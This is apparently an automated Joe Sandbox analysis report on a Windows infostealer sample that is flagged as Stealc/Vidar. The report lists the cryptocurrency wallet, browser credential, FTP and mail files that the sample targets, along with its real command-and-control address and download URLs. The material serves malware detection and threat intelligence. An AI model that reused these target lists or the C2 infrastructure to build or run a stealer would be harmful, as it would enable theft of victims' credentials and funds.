Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.jsonc
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5424, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2266789162.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2038617483.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5424, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 5424, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true		unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	IDBFHJDA.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	IDBFHJDA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpdowsApps	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	KJECFHCBKKEBAKFIJDHI.0.dr	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2282756782.0000000029351000.00000004.00000020.00020000.00000000.sdmp, KJECFHCBKKEBAKFIJDHI.0.dr	false		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllPZ	file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, IDBFHJDA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2266789162.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll:Z	file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpge	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dllrX	file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, IDBFHJDA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37S	file.exe, 00000000.00000002.2266789162.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll&Z	file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpPQ	file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2277615108.000000001D2A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287566272.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpLQ	file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpQ	file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpP	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	IDBFHJDA.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpare	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dllPX	file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpinomi	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpX	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll4Z	file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	IDBFHJDA.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, IDBFHJDA.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000002.2282756782.0000000029351000.00000004.00000020.00020000.00000000.sdmp, KJECFHCBKKEBAKFIJDHI.0.dr	false		unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpH	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, IDBFHJDA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php(Q	file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000002.2282756782.0000000029351000.00000004.00000020.00020000.00000000.sdmp, KJECFHCBKKEBAKFIJDHI.0.dr	false		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2282756782.0000000029351000.00000004.00000020.00020000.00000000.sdmp, KJECFHCBKKEBAKFIJDHI.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/)I	file.exe, 00000000.00000002.2266789162.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2282756782.0000000029351000.00000004.00000020.00020000.00000000.sdmp, KJECFHCBKKEBAKFIJDHI.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpwser	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2282756782.0000000029351000.00000004.00000020.00020000.00000000.sdmp, KJECFHCBKKEBAKFIJDHI.0.dr	false		unknown
https://support.mozilla.org	HJJJJKEHCAKFBFHJKEHCFIIDAE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll8n	file.exe, 00000000.00000002.2266789162.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	IDBFHJDA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpdllz	file.exe, 00000000.00000002.2266789162.0000000000D45000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523568
Start date and time:	2024-10-01 19:31:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 79 Number of non-executed functions: 114
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
